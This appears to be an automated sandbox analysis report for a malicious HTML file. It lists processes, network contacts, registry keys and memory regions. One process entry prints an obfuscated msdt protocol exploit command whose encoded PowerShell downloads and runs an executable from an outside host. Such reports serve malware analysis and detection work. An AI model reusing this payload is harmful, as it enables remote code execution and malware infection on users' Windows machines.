Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1828,i,12602353745346656133,16460015602543345588,131072
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
|
||
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072
/prefetch:8
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
172.217.168.78
|
||
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
216.58.215.237
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
accounts.google.com
|
216.58.215.237
|
||
www.google.com
|
172.217.168.36
|
||
clients.l.google.com
|
172.217.168.78
|
||
clients2.google.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.1
|
unknown
|
unknown
|
||
216.58.215.237
|
accounts.google.com
|
United States
|
||
172.217.168.78
|
clients.l.google.com
|
United States
|
||
172.217.168.36
|
www.google.com
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
192.168.2.23
|
unknown
|
unknown
|
||
127.0.0.1
|
unknown
|
unknown
|
||
192.168.2.4
|
unknown
|
unknown
|
||
192.168.2.5
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.cdm.origin_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blocklist_cache_md5_digest
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
There are 45 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
26F95B70000
|
heap
|
page read and write
|
||
26F95E24000
|
heap
|
page read and write
|
||
26F95B79000
|
heap
|
page read and write
|
||
BE5537E000
|
stack
|
page read and write
|
||
1F51C032000
|
heap
|
page read and write
|
||
C75B07F000
|
stack
|
page read and write
|
||
20F9AC70000
|
heap
|
page read and write
|
||
2090658C000
|
heap
|
page read and write
|
||
20FA0400000
|
heap
|
page read and write
|
||
20FA0504000
|
heap
|
page read and write
|
||
20905C3C000
|
heap
|
page read and write
|
||
22E91D43000
|
heap
|
page read and write
|
||
FC8797B000
|
stack
|
page read and write
|
||
20FA052B000
|
heap
|
page read and write
|
||
19A96E45000
|
heap
|
page read and write
|
||
20906592000
|
heap
|
page read and write
|
||
1F51C013000
|
heap
|
page read and write
|
||
44DBB7B000
|
stack
|
page read and write
|
||
26F95910000
|
heap
|
page read and write
|
||
22E91413000
|
heap
|
page read and write
|
||
20F9B7DC000
|
heap
|
page read and write
|
||
23167370000
|
heap
|
page read and write
|
||
20FA0350000
|
trusted library allocation
|
page read and write
|
||
428FC7A000
|
stack
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
20F9B600000
|
heap
|
page read and write
|
||
194D8E5C000
|
heap
|
page read and write
|
||
D09A3FF000
|
stack
|
page read and write
|
||
428FD7D000
|
stack
|
page read and write
|
||
20FA04FB000
|
heap
|
page read and write
|
||
1F51BF40000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
6D5E87E000
|
stack
|
page read and write
|
||
26F95A70000
|
heap
|
page read and write
|
||
26F95C41000
|
heap
|
page read and write
|
||
20BCF671000
|
heap
|
page read and write
|
||
2090656D000
|
heap
|
page read and write
|
||
22E9148B000
|
heap
|
page read and write
|
||
20FA0326000
|
trusted library allocation
|
page read and write
|
||
20F9AF13000
|
heap
|
page read and write
|
||
1F51C03B000
|
heap
|
page read and write
|
||
2090651A000
|
heap
|
page read and write
|
||
2260BC55000
|
heap
|
page read and write
|
||
1F51C076000
|
heap
|
page read and write
|
||
26F95C5D000
|
heap
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
8096EFE000
|
stack
|
page read and write
|
||
194D8E76000
|
heap
|
page read and write
|
||
175F1850000
|
heap
|
page read and write
|
||
20F9B79C000
|
heap
|
page read and write
|
||
D09A47E000
|
stack
|
page read and write
|
||
14CA5B90000
|
trusted library allocation
|
page read and write
|
||
20FA0340000
|
trusted library allocation
|
page read and write
|
||
20906578000
|
heap
|
page read and write
|
||
194D8C70000
|
heap
|
page read and write
|
||
2260BD00000
|
heap
|
page read and write
|
||
20F9B79C000
|
heap
|
page read and write
|
||
20FA0515000
|
heap
|
page read and write
|
||
175F186A000
|
heap
|
page read and write
|
||
22E91491000
|
heap
|
page read and write
|
||
175F1802000
|
heap
|
page read and write
|
||
20FA04FB000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
20905CE9000
|
heap
|
page read and write
|
||
20F9B700000
|
heap
|
page read and write
|
||
1F51C045000
|
heap
|
page read and write
|
||
E003FE000
|
stack
|
page read and write
|
||
D09A57A000
|
stack
|
page read and write
|
||
80970FE000
|
stack
|
page read and write
|
||
5181FF000
|
stack
|
page read and write
|
||
20BD0132000
|
heap
|
page read and write
|
||
22E91D22000
|
heap
|
page read and write
|
||
1AA74200000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
FC87D7F000
|
stack
|
page read and write
|
||
20906592000
|
heap
|
page read and write
|
||
26F95C5D000
|
heap
|
page read and write
|
||
20FA0740000
|
trusted library allocation
|
page read and write
|
||
14CA5C27000
|
heap
|
page read and write
|
||
2260BC29000
|
heap
|
page read and write
|
||
20F9BF10000
|
trusted library section
|
page readonly
|
||
20FA0465000
|
heap
|
page read and write
|
||
20906579000
|
heap
|
page read and write
|
||
20905CC0000
|
heap
|
page read and write
|
||
20FA02B3000
|
trusted library allocation
|
page read and write
|
||
2090657B000
|
heap
|
page read and write
|
||
20905BD0000
|
remote allocation
|
page read and write
|
||
ED1D4FF000
|
stack
|
page read and write
|
||
274E3A4D000
|
heap
|
page read and write
|
||
20FA0517000
|
heap
|
page read and write
|
||
1F51C000000
|
heap
|
page read and write
|
||
194D8E00000
|
heap
|
page read and write
|
||
BE5507E000
|
stack
|
page read and write
|
||
20905C4F000
|
heap
|
page read and write
|
||
20906402000
|
heap
|
page read and write
|
||
ED1D5FA000
|
stack
|
page read and write
|
||
26F95C21000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
194D8F13000
|
heap
|
page read and write
|
||
20F9AEA1000
|
heap
|
page read and write
|
||
D099C7F000
|
stack
|
page read and write
|
||
274E3A4F000
|
heap
|
page read and write
|
||
20FA0721000
|
trusted library allocation
|
page read and write
|
||
20F9BEF0000
|
trusted library section
|
page readonly
|
||
20F9B79C000
|
heap
|
page read and write
|
||
2316734B000
|
heap
|
page read and write
|
||
20F9AE77000
|
heap
|
page read and write
|
||
20F9AEBC000
|
heap
|
page read and write
|
||
20FA04F4000
|
heap
|
page read and write
|
||
1F51C058000
|
heap
|
page read and write
|
||
D09A97E000
|
stack
|
page read and write
|
||
175F1900000
|
heap
|
page read and write
|
||
231672A0000
|
heap
|
page read and write
|
||
20905C13000
|
heap
|
page read and write
|
||
19A96E1F000
|
heap
|
page read and write
|
||
C60C1FB000
|
stack
|
page read and write
|
||
C60BDFB000
|
stack
|
page read and write
|
||
22E913D0000
|
trusted library allocation
|
page read and write
|
||
1AA7422A000
|
heap
|
page read and write
|
||
14CA5C3C000
|
heap
|
page read and write
|
||
20FA0510000
|
heap
|
page read and write
|
||
2260BC8C000
|
heap
|
page read and write
|
||
209065B0000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
19A96E37000
|
heap
|
page read and write
|
||
26F99170000
|
heap
|
page read and write
|
||
C60C3F7000
|
stack
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
209065BF000
|
heap
|
page read and write
|
||
20BCF6EC000
|
heap
|
page read and write
|
||
517D3B000
|
stack
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
175F1800000
|
heap
|
page read and write
|
||
20905CE2000
|
heap
|
page read and write
|
||
20BCF6C8000
|
heap
|
page read and write
|
||
20905C00000
|
heap
|
page read and write
|
||
20BD0002000
|
heap
|
page read and write
|
||
20905C55000
|
heap
|
page read and write
|
||
22E91486000
|
heap
|
page read and write
|
||
26F95BB5000
|
heap
|
page read and write
|
||
23167357000
|
heap
|
page read and write
|
||
22E9158E000
|
heap
|
page read and write
|
||
6D5E9FB000
|
stack
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
22E91E30000
|
heap
|
page read and write
|
||
20906574000
|
heap
|
page read and write
|
||
44DB87B000
|
stack
|
page read and write
|
||
20FA07A0000
|
remote allocation
|
page read and write
|
||
20F9B7DC000
|
heap
|
page read and write
|
||
274E3A7B000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
194D8E40000
|
heap
|
page read and write
|
||
194D8DE0000
|
trusted library allocation
|
page read and write
|
||
A6A1F9F000
|
stack
|
page read and write
|
||
ED1CD7C000
|
stack
|
page read and write
|
||
3F4F56B000
|
stack
|
page read and write
|
||
2090658A000
|
heap
|
page read and write
|
||
194D8F02000
|
heap
|
page read and write
|
||
20F9AC00000
|
heap
|
page read and write
|
||
175F1908000
|
heap
|
page read and write
|
||
175F187D000
|
heap
|
page read and write
|
||
1F51C064000
|
heap
|
page read and write
|
||
6D5EAFC000
|
stack
|
page read and write
|
||
2090657B000
|
heap
|
page read and write
|
||
20FA04AC000
|
heap
|
page read and write
|
||
2090659F000
|
heap
|
page read and write
|
||
A6A2AF8000
|
stack
|
page read and write
|
||
274E3A13000
|
heap
|
page read and write
|
||
20905C5A000
|
heap
|
page read and write
|
||
22E91D91000
|
heap
|
page read and write
|
||
22E91D00000
|
heap
|
page read and write
|
||
209065B0000
|
heap
|
page read and write
|
||
19A96E2E000
|
heap
|
page read and write
|
||
14CA5C59000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
20905BD0000
|
remote allocation
|
page read and write
|
||
FC8767C000
|
stack
|
page read and write
|
||
20906A52000
|
heap
|
page read and write
|
||
20FA0506000
|
heap
|
page read and write
|
||
20FA0502000
|
heap
|
page read and write
|
||
20FA0512000
|
heap
|
page read and write
|
||
5185FF000
|
stack
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
2090651D000
|
heap
|
page read and write
|
||
20FA044E000
|
heap
|
page read and write
|
||
6D5E13B000
|
stack
|
page read and write
|
||
26F95E20000
|
heap
|
page read and write
|
||
20FA1000000
|
heap
|
page read and write
|
||
20FA04AA000
|
heap
|
page read and write
|
||
20906579000
|
heap
|
page read and write
|
||
44DBE7F000
|
stack
|
page read and write
|
||
E002FE000
|
stack
|
page read and write
|
||
1F51BFD0000
|
trusted library allocation
|
page read and write
|
||
22E91260000
|
heap
|
page read and write
|
||
20FA0320000
|
trusted library allocation
|
page read and write
|
||
20905C88000
|
heap
|
page read and write
|
||
1AA74302000
|
heap
|
page read and write
|
||
20FA04BA000
|
heap
|
page read and write
|
||
209065BF000
|
heap
|
page read and write
|
||
D09A2FE000
|
stack
|
page read and write
|
||
20F9AD80000
|
trusted library section
|
page read and write
|
||
44DB97F000
|
stack
|
page read and write
|
||
ED1D87F000
|
stack
|
page read and write
|
||
20906593000
|
heap
|
page read and write
|
||
20FA0514000
|
heap
|
page read and write
|
||
22E91E02000
|
heap
|
page read and write
|
||
2090654C000
|
heap
|
page read and write
|
||
1AA74259000
|
heap
|
page read and write
|
||
A6A29F9000
|
stack
|
page read and write
|
||
2260BC70000
|
heap
|
page read and write
|
||
20F9B759000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
20FA0327000
|
trusted library allocation
|
page read and write
|
||
26F99171000
|
heap
|
page read and write
|
||
175F1913000
|
heap
|
page read and write
|
||
1AA741A0000
|
remote allocation
|
page read and write
|
||
20FA0325000
|
trusted library allocation
|
page read and write
|
||
428FCFF000
|
stack
|
page read and write
|
||
20905CB5000
|
heap
|
page read and write
|
||
20FA0535000
|
heap
|
page read and write
|
||
BE5527F000
|
stack
|
page read and write
|
||
20F9AE13000
|
heap
|
page read and write
|
||
20F9B7DC000
|
heap
|
page read and write
|
||
23167370000
|
heap
|
page read and write
|
||
2090657C000
|
heap
|
page read and write
|
||
14CA5A20000
|
heap
|
page read and write
|
||
274E3A70000
|
heap
|
page read and write
|
||
20FA050A000
|
heap
|
page read and write
|
||
6D5E6FF000
|
stack
|
page read and write
|
||
20FA050C000
|
heap
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
2260BBC0000
|
trusted library allocation
|
page read and write
|
||
14CA5C60000
|
heap
|
page read and write
|
||
26F95C5D000
|
heap
|
page read and write
|
||
FC87C7E000
|
stack
|
page read and write
|
||
22E91DD4000
|
heap
|
page read and write
|
||
20FA0354000
|
trusted library allocation
|
page read and write
|
||
20F9AC10000
|
heap
|
page read and write
|
||
1F51C062000
|
heap
|
page read and write
|
||
20BCF647000
|
heap
|
page read and write
|
||
194D8E29000
|
heap
|
page read and write
|
||
20FA0324000
|
trusted library allocation
|
page read and write
|
||
26F95A50000
|
heap
|
page read and write
|
||
2090659F000
|
heap
|
page read and write
|
||
274E3A66000
|
heap
|
page read and write
|
||
D09A5FF000
|
stack
|
page read and write
|
||
26F975D4000
|
heap
|
page read and write
|
||
1AA74C02000
|
trusted library allocation
|
page read and write
|
||
20906592000
|
heap
|
page read and write
|
||
14CA5C5C000
|
heap
|
page read and write
|
||
ED1D37C000
|
stack
|
page read and write
|
||
19A96E29000
|
heap
|
page read and write
|
||
1F51C057000
|
heap
|
page read and write
|
||
1F51C066000
|
heap
|
page read and write
|
||
20F9B79A000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
20F9AF02000
|
heap
|
page read and write
|
||
209059B0000
|
heap
|
page read and write
|
||
1AA74275000
|
heap
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
274E3A50000
|
heap
|
page read and write
|
||
20BCF6E1000
|
heap
|
page read and write
|
||
20FA0700000
|
trusted library allocation
|
page read and write
|
||
26F95C48000
|
heap
|
page read and write
|
||
6D5EDFF000
|
stack
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
20F9AE8B000
|
heap
|
page read and write
|
||
20906579000
|
heap
|
page read and write
|
||
22E91D54000
|
heap
|
page read and write
|
||
2260BC79000
|
heap
|
page read and write
|
||
2260BC4A000
|
heap
|
page read and write
|
||
1AA74140000
|
heap
|
page read and write
|
||
14CA5A30000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
20FA050B000
|
heap
|
page read and write
|
||
20BCF5E0000
|
trusted library allocation
|
page read and write
|
||
274E3A47000
|
heap
|
page read and write
|
||
20FA070E000
|
trusted library allocation
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
20905C4B000
|
heap
|
page read and write
|
||
20906583000
|
heap
|
page read and write
|
||
C75AFFF000
|
stack
|
page read and write
|
||
23167340000
|
heap
|
page read and write
|
||
20906597000
|
heap
|
page read and write
|
||
2090658F000
|
heap
|
page read and write
|
||
22E9142F000
|
heap
|
page read and write
|
||
1F51C07A000
|
heap
|
page read and write
|
||
20FA0441000
|
heap
|
page read and write
|
||
809687B000
|
stack
|
page read and write
|
||
1F51C07D000
|
heap
|
page read and write
|
||
22E91488000
|
heap
|
page read and write
|
||
20906587000
|
heap
|
page read and write
|
||
1F51C083000
|
heap
|
page read and write
|
||
274E3B08000
|
heap
|
page read and write
|
||
20FA0515000
|
heap
|
page read and write
|
||
22E91E27000
|
heap
|
page read and write
|
||
274E3A3C000
|
heap
|
page read and write
|
||
80972FF000
|
stack
|
page read and write
|
||
5182FB000
|
stack
|
page read and write
|
||
22E91DC5000
|
heap
|
page read and write
|
||
D099E7A000
|
stack
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
1AA74202000
|
heap
|
page read and write
|
||
14CA5C00000
|
heap
|
page read and write
|
||
20FA04C1000
|
heap
|
page read and write
|
||
274E3A00000
|
heap
|
page read and write
|
||
2090658A000
|
heap
|
page read and write
|
||
274E3A52000
|
heap
|
page read and write
|
||
20905D08000
|
heap
|
page read and write
|
||
1F51C069000
|
heap
|
page read and write
|
||
1F51C06A000
|
heap
|
page read and write
|
||
20906568000
|
heap
|
page read and write
|
||
2260BD08000
|
heap
|
page read and write
|
||
22E91D02000
|
heap
|
page read and write
|
||
194D8E67000
|
heap
|
page read and write
|
||
274E39F0000
|
trusted library allocation
|
page read and write
|
||
E0027E000
|
stack
|
page read and write
|
||
22E91C02000
|
heap
|
page read and write
|
||
209065B0000
|
heap
|
page read and write
|
||
20FA032B000
|
trusted library allocation
|
page read and write
|
||
20FA0493000
|
heap
|
page read and write
|
||
2090658C000
|
heap
|
page read and write
|
||
274E3B00000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
274E3A4B000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
26F95E2E000
|
heap
|
page read and write
|
||
20FA0320000
|
trusted library allocation
|
page read and write
|
||
209065B4000
|
heap
|
page read and write
|
||
20FA050A000
|
heap
|
page read and write
|
||
20FA0321000
|
trusted library allocation
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
19A96E00000
|
heap
|
page read and write
|
||
20F9B758000
|
heap
|
page read and write
|
||
44DBD77000
|
stack
|
page read and write
|
||
20F9BD03000
|
trusted library allocation
|
page read and write
|
||
20FA08F0000
|
trusted library allocation
|
page read and write
|
||
2090659F000
|
heap
|
page read and write
|
||
20F9BEE0000
|
trusted library section
|
page readonly
|
||
2090658E000
|
heap
|
page read and write
|
||
20F9B713000
|
heap
|
page read and write
|
||
E7FD9B000
|
stack
|
page read and write
|
||
20FA02F0000
|
trusted library allocation
|
page read and write
|
||
20906587000
|
heap
|
page read and write
|
||
23167280000
|
heap
|
page read and write
|
||
3F4F97E000
|
stack
|
page read and write
|
||
14CA5D02000
|
heap
|
page read and write
|
||
20FA0421000
|
heap
|
page read and write
|
||
20FA0502000
|
heap
|
page read and write
|
||
2090657F000
|
heap
|
page read and write
|
||
20FA0280000
|
trusted library allocation
|
page read and write
|
||
209065A3000
|
heap
|
page read and write
|
||
2260BC3C000
|
heap
|
page read and write
|
||
22E91484000
|
heap
|
page read and write
|
||
D099F7A000
|
stack
|
page read and write
|
||
20FA0720000
|
trusted library allocation
|
page read and write
|
||
2260BC86000
|
heap
|
page read and write
|
||
22E91E00000
|
heap
|
page read and write
|
||
BE550FE000
|
stack
|
page read and write
|
||
20F9AEFE000
|
heap
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
20906579000
|
heap
|
page read and write
|
||
20905D02000
|
heap
|
page read and write
|
||
428FB7F000
|
stack
|
page read and write
|
||
20F9AD70000
|
trusted library allocation
|
page read and write
|
||
14CA5C85000
|
heap
|
page read and write
|
||
23167540000
|
heap
|
page read and write
|
||
14CA5D08000
|
heap
|
page read and write
|
||
3F4FA7F000
|
stack
|
page read and write
|
||
20BCF68A000
|
heap
|
page read and write
|
||
1F51C056000
|
heap
|
page read and write
|
||
209065B0000
|
heap
|
page read and write
|
||
22E91270000
|
heap
|
page read and write
|
||
175F1856000
|
heap
|
page read and write
|
||
20F9B758000
|
heap
|
page read and write
|
||
1F51C002000
|
heap
|
page read and write
|
||
19A96CF0000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
22E9143D000
|
heap
|
page read and write
|
||
20BCF713000
|
heap
|
page read and write
|
||
E007FD000
|
stack
|
page read and write
|
||
274E3A29000
|
heap
|
page read and write
|
||
20905D13000
|
heap
|
page read and write
|
||
20FA0730000
|
trusted library allocation
|
page read and write
|
||
209059A0000
|
heap
|
page read and write
|
||
51807E000
|
stack
|
page read and write
|
||
44DBA7B000
|
stack
|
page read and write
|
||
20BCF5B0000
|
heap
|
page read and write
|
||
22E91E13000
|
heap
|
page read and write
|
||
274E4402000
|
trusted library allocation
|
page read and write
|
||
20905C59000
|
heap
|
page read and write
|
||
22E91429000
|
heap
|
page read and write
|
||
20FA0320000
|
trusted library allocation
|
page read and write
|
||
20FA0750000
|
trusted library allocation
|
page read and write
|
||
BE5557E000
|
stack
|
page read and write
|
||
6D5EBFE000
|
stack
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
3F4FB79000
|
stack
|
page read and write
|
||
20905C4D000
